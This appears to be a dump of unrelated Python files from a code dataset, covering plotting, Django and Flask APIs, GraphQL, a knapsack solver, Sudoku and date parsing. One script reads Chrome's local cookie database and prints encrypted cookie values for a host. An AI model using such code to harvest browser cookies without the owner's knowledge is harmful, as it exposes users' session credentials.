generategraph(fil, idx)
###########3
import matplotlib.image as mpimg
img=mpimg.imread('popcopy.png')
img1=mpimg.imread('crossover.png')
img2=mpimg.imread('mutate.png')
imgplot = plt.imshow(img)
plt.show()
fig3 = plt.figure(constrained_layout=True)
gs = fig3.add_gridspec(2, 2)
f3_ax1 = fig3.add_subplot(gs[:, 0])
f3_ax1.set_title('population')
f3_ax1.set_axis_off()
f3_ax2 = fig3.add_subplot(gs[0, 1])
f3_ax2.set_title('crossover')
f3_ax1.set_axis_off()
f3_ax3 = fig3.add_subplot(gs[1, 1])
f3_ax3.set_title('mutation')
f3_ax1.set_axis_off()
f3_ax2.set_axis_off()
f3_ax3.set_axis_off()
f3_ax1.imshow(img)
f3_ax2.imshow(img1)
f3_ax3.imshow(img2)
plt.savefig("all.png", dpi = 700)
plt.show()
# Two subplots, the axes array is 1-d
f, axarr = plt.subplots(2, sharex=True)
axarr[0].imshow(img1)
axarr[0].set_title('crossover')
axarr[1].imshow(img2)
axarr[1].set_title('mutation')
axarr[0].set_axis_off()
axarr[1].set_axis_off()
plt.savefig("offspring.png", dpi = 800)
plt.show()
img3=mpimg.imread('offspring.png')
#########
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
ax1.imshow(img)
ax2.imshow(img3)
ax1.set_axis_off()
ax2.set_axis_off()
plt.savefig("combo.png", dpi = 800)
plt.show()
# Two subplots, the axes array is 1-d
f, axarr = plt.subplots(3, sharex=True)
axarr[0].imshow(img)
axarr[1].imshow(img1)
axarr[1].set_title('crossover')
axarr[2].imshow(img2)
axarr[2].set_title('mutation')
axarr[0].set_axis_off()
axarr[1].set_axis_off()
axarr[2].set_axis_off()
plt.savefig("combo.png", dpi = 800)
plt.show() |
996,686 | a392264a15162dec84182f5d31137642fe51be1f | # -*- coding: utf-8 -*-
from django.http import Http404
from rest_framework.views import APIView
from rest_framework import status, permissions
from rest_framework.response import Response
from api import serializers
from api.permissions import IsAuthorOrReadOnly
from lbs2 import models
# List of orders
class VehicleList(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request):
queryset = request.user.object_set.all()
serializer = serializers.VehicleSerializer(queryset, many=True, context={'request': request})
return Response(serializer.data)
# Order detail
class VehicleDetail(APIView):
permission_classes = (permissions.IsAuthenticated, IsAuthorOrReadOnly, )
def get_object(self, pk):
try:
return models.Object.objects.get(pk=pk)
except models.Object.DoesNotExist:
raise Http404
def get(self, request, pk, format=None):
order = self.get_object(pk)
serializer = serializers.VehicleSerializer(order)
return Response(serializer.data)
def put(self, request, pk, format=None):
vehicle = self.get_object(pk)
serializer = serializers.VehicleDetailSerializer(vehicle, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# List of settings
class SettingsList(APIView):
permission_classes = (permissions.IsAuthenticated, )
def get(self, request):
queryset = models.Setting.objects.get(id=1)
serializer = serializers.SettingsSerializer(queryset)
return Response(serializer.data)
|
996,687 | e16aa22ab171280b0086f8097f8cd08270500ce5 | from random import randint, seed
from time import time
seed(time())
tst = input()
print tst
for t in range(tst):
n, m, k = 100, 5000, 5000
print n, m, k
for u in range(2, 101):
print u-1, u, randint(1, 1000)
for i in range(99, m):
u = randint(1, n-1)
v, w = randint(u+1, n), randint(1, 1000)
print u, v, w
for i in range(k):
print randint(1, n), randint(1, n)
|
996,688 | 0ecaab3f4514c2d32e03f3fc14daa46cb48883a8 | from facundo import nombre
nombre.mostrarNombre() |
996,689 | cb8c3524c7a5e1bf96e17f91df9017e012808fdd | import sys,urllib.request,re,os
if len(sys.argv)!=2:
print("Specify an N3 block identifier")
sys.exit()
dataset=sys.argv[1]
with urllib.request.urlopen("http://cmbn-navigator.uio.no/navigator/feeder/all_pyramids/?id="+dataset) as http:
page=http.read().decode("utf-8")
trs=page.split("</tr>")
if len(trs)==1:
print("Some error happened,see N3 message below:")
print()
print(re.match(".*<body>(.*)</body>",page.replace("\r","").replace("\n",""),re.MULTILINE).groups()[0])
sys.exit()
folder="downloads/"+dataset
os.makedirs(folder,exist_ok=True)
os.chdir(folder)
for row in (re.sub("\\s+","",tr) for tr in trs[1:-1]):
pair=re.match("<tr><td>([^<]+)</td><td>([^<]+)",row).groups()
print(pair)
with open(pair[1]+".zip","wb") as f:
with urllib.request.urlopen("http://cmbn-navigator.uio.no/navigator/feeder/pyramid/?id="+pair[0]) as http:
while True:
chunk=http.read(64*1024*1024)
if not chunk:
break
f.write(chunk)
|
996,690 | 4c1790b8aea07197717f33a5e9396ef6f2215cf9 | import config
class Cell(object):
def __init__(self, pos=-1, value=0, is_starter=False):
self.values = [] if value == 0 else [value]
self.locked = []
self.pos = pos
self.is_starter = is_starter
self.candidates = config.PUZZLE_DEF['VALUES'].copy()
def get_cell_name(self):
row = self.pos // config.PUZZLE_DEF['NO_COLS']
col = self.pos % config.PUZZLE_DEF['NO_COLS']
return config.PUZZLE_DEF['ROW_NAMES'][row] + config.PUZZLE_DEF['COL_NAMES'][col]
def get_num_candidates(self):
return len(self.candidates)
def get_candidates(self):
return self.candidates
def remove_candidate(self, value):
self.candidates.remove(value)
def is_solved(self):
return len(self.values) == 1
def get_value(self):
if self.is_solved():
return self.values[0]
else:
return 0
def set_value(self, value):
self.values = [value]
def set_values(self, values):
self.values = values.copy()
|
996,691 | 715a408e972dcd26ce4643dcd99264b0753052a7 | import decimal
import graphene
from graphene import relay
from . import models
from graphene.types.scalars import Scalar
from graphql.language import ast
class Decimal(Scalar):
"""
The `Decimal` scalar type represents a python Decimal.
"""
@staticmethod
def serialize(dec):
if isinstance(dec, str):
dec = decimal.Decimal(dec)
assert isinstance(dec, decimal.Decimal), (
'Received not compatible Decimal "{}"'.format(repr(dec)))
return str(dec)
@classmethod
def parse_literal(cls, node):
if isinstance(node, ast.StringValue):
return cls.parse_value(node.value)
@staticmethod
def parse_value(value):
try:
return decimal.Decimal(value)
except ValueError:
return None
class ProductInfo(graphene.ObjectType):
class Meta:
interfaces = (relay.Node, )
title = graphene.String()
description = graphene.String()
price = Decimal()
@classmethod
def get_node(self, info, id):
return models.ProductInfo.query.get(id)
class ProductInfoConnection(graphene.Connection):
class Meta:
node = ProductInfo
class Product(graphene.ObjectType):
class Meta:
interfaces = (relay.Node, )
name = graphene.String()
info = graphene.ConnectionField(ProductInfoConnection)
def resolve_info(self, info):
return list(models.ProductInfo.query.filter(
models.ProductInfo.product == self))
@classmethod
def get_node(self, info, id):
return models.Product.query.get(id)
class ProductConnection(graphene.Connection):
class Meta:
node = Product
class Query(graphene.ObjectType):
node = relay.Node.Field()
products = graphene.ConnectionField(ProductConnection)
def resolve_products(self, info):
return models.Product.query.all()
schema = graphene.Schema(query=Query, types=[Product])
|
996,692 | 00b19797edae9351e07910bda41759cbd77b1f85 | #!/usr/bin/env python3
# -*- conding:utf8 -*-
from flask import abort
from flask_restful import Resource, fields, marshal_with, reqparse, inputs
from app.api import api, meta_fields
from app.extensions import auth
from app.models.category import Category as CategoryModel
from app.lib.errors import success, execute_success
from app.lib.decorators import paginate, api_permission_control
# 请求字段过滤
category_parser = reqparse.RequestParser()
category_parser.add_argument('name', type=str)
# args = category_parser.parse_args() # 解析参数
# 格式化输出
category_fields = {
'id': fields.Integer,
'name':fields.String,
}
category_collection_fields = {
'items': fields.List(fields.Nested(category_fields)),
'meta': fields.Nested(meta_fields),
}
class CategoryApi(Resource):
method_decorators = {
'delete': [api_permission_control(), auth.login_required],
'post': [api_permission_control(), auth.login_required],
'put': [api_permission_control(), auth.login_required],
}
@marshal_with(category_fields)
def get(self, id=None):
category = CategoryModel.query.filter_by(id=id).first()
if not category:
abort(404)
return category
def delete(self, id=None):
category = CategoryModel.query.filter_by(id=id).first()
if not category:
abort(404)
category.delete()
return execute_success()
def post(self):
args = category_parser.parse_args()
# category owns the task
category = CategoryModel.create(**args)
return success()
def put(self, id=0, **kwargs):
category = CategoryModel.query.filter_by(id=id).first()
if not category:
abort(404)
category.update(**category_parser.parse_args())
return execute_success()
class CategoryCollectionApi(Resource):
@marshal_with(category_collection_fields)
@paginate(10)
def get(self, category_id=None):
categorys = CategoryModel.query
return categorys
api.add_resource(CategoryApi, '/category' ,'/category/<int:id>', endpoint='category')
api.add_resource(CategoryCollectionApi, '/categorys' , endpoint='categorys') |
996,693 | 16fe04acda607dc4e3798ccfcc8e26b6372af664 | def mochila(v, p, c, i):
if c <= 0 or i == 0:
return 0
else:
if p[i] > c:
return mochila(v, p, c, i-1)
else:
return max(mochila(v, p, c, i-1), mochila(v, p, c - p[i], i-1) + v[i])
v = [1, 3, 5, 7, 15, 2]
p = [5, 2, 10, 8, 10, 8]
c = 25
n = len(v)
print(mochila(v, p, c, n-1)) |
996,694 | 47c3ba5993fa01391808b7fc95ba9286e5174e25 | def find_it(seq):
res = {}
for i in seq:
if res.get(i) == None:
res.setdefault(i, 1)
else:
res[i] += 1
for j in res:
if res[j] % 2 != 0:
return j
print (find_it([1,1,2,-2,5,2,4,4,-1,-2,5]))
# def find_it(seq):
# for i in seq:
# if seq.count(i)%2!=0:
# return i
# def find_it(seq):
# return [x for x in seq if seq.count(x) % 2][0]
|
996,695 | ed4796aa9e528b076a2604ee485da490c0cc7e2b | # Generated by Django 2.1.5 on 2019-02-04 15:17
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("studies", "0001_initial"),
("challenges", "0017_auto_20181214_1256"),
("cases", "0008_auto_20190201_1312"),
]
operations = [
migrations.AddField(
model_name="image",
name="eye_choice",
field=models.CharField(
choices=[
("OD", "Oculus Dexter (right eye)"),
("OS", "Oculus Sinister (left eye)"),
("U", "Unknown"),
("NA", "Not applicable"),
],
default="NA",
help_text="Is this (retina) image from the right or left eye?",
max_length=2,
),
),
migrations.AddField(
model_name="image",
name="modality",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="challenges.ImagingModality",
),
),
migrations.AddField(
model_name="image",
name="study",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.PROTECT,
to="studies.Study",
),
),
]
|
996,696 | a327f0f52ca9570cc50711db28893326d17b6773 | import numpy as np
from queue import deque
class EyeStateManager:
SAMPLES_AVERAGED = 5
BLINK_THRESHOLD = 3
CHANGE_THRESHOLD = 3
def __init__(self, choose_label_callback=np.argmax):
self.sample_queue = deque(maxlen=self.SAMPLES_AVERAGED)
self.last_id = -1
self.blink_count = 0
self.selected_label = None
self.current_label = None
self.current_label_count = 0
self.choose_label_callback = choose_label_callback
self.selection_made = False
self.new_gazed_button = False
def handle_input(self, detection_id, blink, probabilities):
if detection_id != self.last_id:
if blink:
self.blink_count += 1
else:
self.selection_made = False
self.new_gazed_button = False
if self.blink_count >= self.BLINK_THRESHOLD:
self.selection_made = True
self.blink_count = 0
self.sample_queue = deque(maxlen=self.SAMPLES_AVERAGED)
return
self.blink_count = 0
self.sample_queue.appendleft(probabilities)
average_probabilities = self.calculate_average_probabilites()
label = self.choose_label_callback(average_probabilities)
if label == self.current_label:
self.current_label_count += 1
if self.current_label_count == self.CHANGE_THRESHOLD:
self.selected_label = self.current_label
self.new_gazed_button = True
else:
self.current_label = label
self.current_label_count = 1
self.last_id = detection_id
def calculate_average_probabilites(self):
all_data = np.concatenate(tuple(self.sample_queue), axis=0)
return np.average(all_data, 0)
def get_label(self):
return self.selected_label
|
996,697 | c8101ebc443a4a4f0295979ae1f3a7b3594e897c | #!/usr/bin/python
import os
import sqlite3
import requests
def getCookieFromChrome(host='example.webscraping.com'):
cookie_path = '/home/hiro/.config/google-chrome/Default/Cookies'
sql = ("select host_key, name, encrypted_value from cookies "
"where host_key='%s'") % host
with sqlite3.connect(cookie_path) as conn:
cursor = conn.cursor()
data = cursor.execute(sql).fetchall()
print(data)
return data
if __name__ == '__main__':
getCookieFromChrome('.baidu.com')
|
996,698 | b20661b10102ff555ed1895e11df0fee6f93d31f | from datetime import datetime
def reformatDateString(input):
if input is not None and '/' in input:
dObj = datetime.strptime(input, '%m/%d/%Y');
return dObj.strftime('%Y-%m-%d')
def getTimeObjFromDTString(input):
if input is not None and ':' in input and ' ' in input:
date_time_parts = input.split(' ')
if len(date_time_parts) > 1:
time_string = date_time_parts[0]
print time_string
timeObject = datetime.strptime(time_string, '%H:%M%p').time()
return timeObject
return None
def getTimeObjFromDTStringAMPM(input):
if input is not None and ':' in input and ' ' in input:
date_time_parts = input.split(' ')
if len(date_time_parts) > 1:
time_string = date_time_parts[1]
timeObject = datetime.strptime(time_string, '%I:%M %p').time()
return timeObject
return None
def getTimeObjFromDTStringSec(input):
if input is not None and ':' in input and ' ' in input:
date_time_parts = input.split(' ')
if len(date_time_parts) > 1:
time_string = date_time_parts[1]
timeObject = datetime.strptime(time_string, '%H:%M:%S').time()
return timeObject
return None
def getTimeObjectFromString(input):
print ('getTimeObjectFromString: ' + input)
#2018-02-08 19:20
if ':' in input:
time_pieces = input.split(':')
# time_string = time_pieces[1]
hour = time_pieces[0]
minutes = time_pieces[1]
print(hour)
print (minutes)
indicator = minutes[2:4].upper()
second_half_peices = minutes[:2]
minutes = second_half_peices
if len(hour) == 1:
hour = '0' + hour
if hour == '12':
hour = '00'
if indicator == 'PM':
hour = str((int(hour) + 12))
#print(time_string)
time_string = hour + ':' + minutes
time_object = datetime.strptime(time_string, '%H:%M').time()
# print(time_object)
return time_object
return None
def getDateObjectFromString(input):
if len(input.split('-')) == 3:
date_parts = input.split(' ')
date = date_parts[0]
date_object = datetime.strptime(date, '%Y-%m-%d').date()
return date_object
if __name__ == '__main__':
getTimeObjectFromString()
getDateObjectFromString() |
996,699 | ed319626f7ba0158ab37eab8c1b185b5c42e8f99 | import pandas as pd
import re
import logging
def badrow(address: str, city: str) -> bool:
return city.split('_')[0].lower() not in address.lower()
# logging.basicConfig(filename="spotcrime_scrape.log", level=logging.DEBUG,
# filemode='a', format='%(asctime)s %(message)s')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
crime_file = './spotcrime.csv.2'
try:
spotcrime_df = pd.read_csv(crime_file, header=0)
print(spotcrime_df.head())
except FileNotFoundError:
logging.fatal(f"{crime_file} not found.")
except pd.errors.EmptyDataError:
logging.fatal(f"{crime_file} had no data.")
print(f"Shape before filter: {spotcrime_df.shape}")
# spotcrime_df.filter(badrow(spotcrime_df['Address'],spotcrime_df['Place']))
df_new = spotcrime_df[spotcrime_df.apply(lambda x: x['Place'].split('_')[0].lower() in x['Address'].lower(), axis=1)]
print(f"Shape after filter: {df_new.shape}")
df_new.to_csv('sc_cleaned.csv',header=True, index=False)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.